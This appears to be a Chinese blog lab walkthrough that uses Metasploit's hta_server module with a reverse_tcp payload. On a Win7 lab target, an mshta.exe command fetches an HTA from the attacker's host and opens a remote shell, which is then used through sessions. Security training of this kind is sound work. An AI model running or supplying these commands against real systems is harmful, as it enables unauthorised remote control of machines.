目录
概述
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解如何开发攻击工具。然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。
操作过程
1.启动并登录win7靶机
2. 使用Metasploit 获取远程 shell
2.1 打开kali终端,打开Metasploit 控制台
(启动命令:msfconsole)
成功启动画面
2.2 启动后,使用以下命令加载 exploit 模块和 payload
use exploit/windows/misc/hta_server
set payload windows/shell/reverse_tcp
2.3 设置 server 的监听端口为 8888
set srvport 8888
2.4 设置本地 IP 及本地监听端口为 12345
set lhost 192.xxx.xx.xx(自己kali的IP)
set lhost 192.xxx.xx.xx(kali的IP)
set lport 12345
2.5 查看输入的配置
show options
2.6 运行 exploit:run
3. 在Win7靶机中运行命令
3.1 mshta.exe是用于负责解释运行HTA文件的Windows OS实用程序·可以运行javascript或VBScript的HTML文件,在win7靶机中打开cmd窗口(Win+R打开)
3.2 输入命令:mshta.exe http://192.xxx.xx.xx(kali的IP):8888/xxx(hta文件名).hta
就是在kali中run之后得到的(如下图)
3.3 在Win靶机中cmd窗口输入命令
mshta.exe http://192.xxx.xx.xx(kali的IP):8888/xxx(hta文件名).hta
4.查看信息
4.1 现在切换回 Kali,你就可以在控制台中看到 Metasploit 已经成功收到来自靶机的负载请求并且建立了 Shell 连接。
4.2 Metasploit 建立的会话在 1 上,可以使用 sessions 命令查看详细信息
4.3 使用 sessions -i 1 命令,你就会跳入 Windows 命令窗口下。执行 ipconfig 命令来查看受害者的 IP 信息
总结
Metasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞、攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metasploit框架可以从一个漏洞扫描程序导入数据,使用关于有漏洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击。所有这些操作都可以通过Metasploit的Web界面进行管理,而它只是其中一种种管理接口,另外还有命令行工具和一些商业工具等等。
攻击者可以将来自漏洞扫描程序的结果导入到Metasploit框架的开源安全工具Armitage中,然后通过Metasploit的模块来确定漏洞。一旦发现了漏洞,攻击者就可以采取一种可行方法攻击系统,通过Shell或启动Metasploit的meterpreter来控制这个系统。
这些有效载荷就是在获得本地系统访问之后执行的一系列命令。这个过程需要参考一些文档并使用一些数据库技术,在发现漏洞之后开发一种可行的攻击方法。其中有效载荷数据库包含用于提取本地系统密码、安装其他软件或控制硬件等的模块,这些功能很像以前BO2K等工具所具备的功能。
Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解如何开发攻击工具。然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。
3988
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
